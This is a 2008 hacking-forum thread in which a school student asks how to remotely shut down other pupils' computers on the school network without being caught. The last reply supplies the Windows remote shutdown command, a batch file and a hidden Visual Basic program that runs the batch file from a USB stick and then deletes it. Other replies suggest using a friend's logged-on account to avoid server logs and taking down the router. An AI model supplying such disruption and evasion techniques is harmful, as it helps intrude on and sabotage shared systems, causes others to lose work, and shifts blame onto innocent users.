remote access to computers

A place where newbies can post without (much) fear of reprisal. All mission posts should still go in the applicable forum.
Forum rules
Older HTS users: Be nice to the new people.

NEW USERS: This is NOT the place to post about missions! Refer to "Missions" category.

remote access to computers

Post by ComputerShark on Wed Sep 10, 2008 11:51 am
([msg=11330]see remote access to computers[/msg])

basically at school (i dont care if its wrong to do it, if i get in trouble then i get in trouble.

How do you remotely shut down peoples computers?

like, through command prompt on windows xp?

i dont have admin rights but i think its still possible

the school is networked by a server for each department
maths, english, science, things like that
but everything is saved on a P:/ if that helps?
peoples logon names are the four letters of their last name, and the first two of their first name, then the year they joined in.

e.g mine is longry06

Any help?

and no bash bash bash flame flame flame...
because this is Nzone, for the n00bs of hts.
+im still learning :)


cs.
ComputerShark
New User
New User
 
Posts: 13
Joined: Mon Aug 18, 2008 3:19 pm
Blog: View Blog (0)


Re: remote access to computers

Post by MrMayhem on Wed Sep 10, 2008 12:17 pm
([msg=11333]see Re: remote access to computers[/msg])

Look at batch files
MrMayhem
New User
New User
 
Posts: 10
Joined: Mon Sep 01, 2008 4:01 am
Blog: View Blog (0)


Re: remote access to computers

Post by ComputerShark on Wed Sep 10, 2008 12:24 pm
([msg=11334]see Re: remote access to computers[/msg])

and how do i do that?


+how will that help?




cs.
ComputerShark
New User
New User
 
Posts: 13
Joined: Mon Aug 18, 2008 3:19 pm
Blog: View Blog (0)


Re: remote access to computers

Post by nosidius on Wed Sep 10, 2008 3:34 pm
([msg=11343]see Re: remote access to computers[/msg])

there is a way to shutdown things remotely....... but don't do it, gets you in lots of trouble

and if you are, just research those key words........... "remote shut down CMD", and look at what you find..........
give me knowledge or give me death
User avatar
nosidius
Poster
Poster
 
Posts: 177
Joined: Fri Aug 08, 2008 1:40 pm
Blog: View Blog (0)


Re: remote access to computers

Post by -0mega- on Wed Sep 10, 2008 3:48 pm
([msg=11353]see Re: remote access to computers[/msg])

As for how / why it would help.

Windows has a command prompt that allows you to execute various commands, depending on the restrictions set in place.
a .BAT will automatically execute all the commands written within the .bat, allowing for an automated shutdown on a PC.
-0mega-
New User
New User
 
Posts: 24
Joined: Fri Sep 05, 2008 3:47 pm
Blog: View Blog (0)


Re: remote access to computers

Post by nosidius on Wed Sep 10, 2008 7:14 pm
([msg=11371]see Re: remote access to computers[/msg])

assuming they always connect through the same i.p., you also have to know the i.p. in the first place, however to get to the menu yes, you can do that
give me knowledge or give me death
User avatar
nosidius
Poster
Poster
 
Posts: 177
Joined: Fri Aug 08, 2008 1:40 pm
Blog: View Blog (0)


Re: remote access to computers

Post by ComputerShark on Thu Sep 11, 2008 2:05 pm
([msg=11410]see Re: remote access to computers[/msg])

well in response to the replies

1. I know i will get in trouble
but not if i get caught, thats why im asking?

2. I still dont understand? I mean remote access...not touching the other computer!

3. I can easily get the ip address, and i think its the same for all?

cs.
ComputerShark
New User
New User
 
Posts: 13
Joined: Mon Aug 18, 2008 3:19 pm
Blog: View Blog (0)


Re: remote access to computers

Post by -0mega- on Thu Sep 11, 2008 4:00 pm
([msg=11413]see Re: remote access to computers[/msg])

The same for *all*?
This is hardly ever the case.
They probably all share the same external IP, but the internal IP of the pc's should be different.
-0mega-
New User
New User
 
Posts: 24
Joined: Fri Sep 05, 2008 3:47 pm
Blog: View Blog (0)


Re: remote access to computers

Post by nosidius on Thu Sep 11, 2008 8:20 pm
([msg=11443]see Re: remote access to computers[/msg])

you can change them as well......... and you can always just shut down the router too piss everyone off, thats fun (always and forever!)

as for more practical applications, you can use it on intruding crackers, so have fun with them!(maybe add in a message!)
and we know you don't care, i was adding in my own warning too it

and YES it's remote, (hello!!!! remote shutdown!)
give me knowledge or give me death
User avatar
nosidius
Poster
Poster
 
Posts: 177
Joined: Fri Aug 08, 2008 1:40 pm
Blog: View Blog (0)


Re: remote access to computers

Post by feenixb1o7 on Sat Sep 13, 2008 7:34 pm
([msg=11635]see Re: remote access to computers[/msg])

Remote shutdown is fun but also very dodgy, everytime you run a remote shutdown you lave a log in the server, stating your somputer name and user account, so the best way is to get a stupid mate to leave his computer logged on and do it from there :D
I would also suggest a timed program that runs a batch file with the shutdown command in it... something simple in VB should work. but anyway, the codes for remote shutdown depend on the operating system... I assume you are using XP... you may have said but I didn't read properly :D

but for XP it's:

Shutdown -s -f -m \\Computer name goes here -t 00 <-- the "00" is the time untill the shutdown, "00" is instant.

You can aslo add "-c 'Comment goes here'" to give the user a little spook.

I must say though, if you do plan to use this then expect to get into trouble, quite frankly it's fun if it's on your own network and you're just pranking your mates but on a school server it's a bit silly... The user could have important work up and they will fall behind...

If you want it in a batch file type this into a text document and save it as a batch file:

Code: Select all
@echo off
shutdown -s -f -m \\comp name-t 00

Simple as. Heres some code you could use to make it a VB program, you could place the program on a USB disk then throw it away... or on a floppy. You also need the batch file on the same drive.

All you need is 2 timers, both disabled on start up.

timer 1's interval needs to be set to around 65000 so you have about 65 seconds to get out clean
timer 2's interval should be like 3000

Code: Select all

Private Sub Form_Load()

Me.Visible = False

Timer1.Enabled = True

End Sub

Private Sub Timer1_Timer()

Dim input_file As String
Dim output_file As String

input_file = "e:\lol.bat"
output_file = "c:\lol.bat"

FileCopy input_file, output_file

Dim ret As Variant
ret = Shell("c:\lol.bat", vbNormalFocus)

Timer2.Enabled = True

End Sub

Private Sub Timer2_Timer()

Kill ("c:\lol.bat")

End Sub




That should work fine... But I wouldn't do it... like I said, it's sad and just not worth it. then why did I write this tutorial you may ask?... It's because I'm bored :D
feenixb1o7
New User
New User
 
Posts: 14
Joined: Sun Sep 07, 2008 6:10 pm
Blog: View Blog (0)


Next

Return to NZone

Who is online

Users browsing this forum: No registered users and 0 guests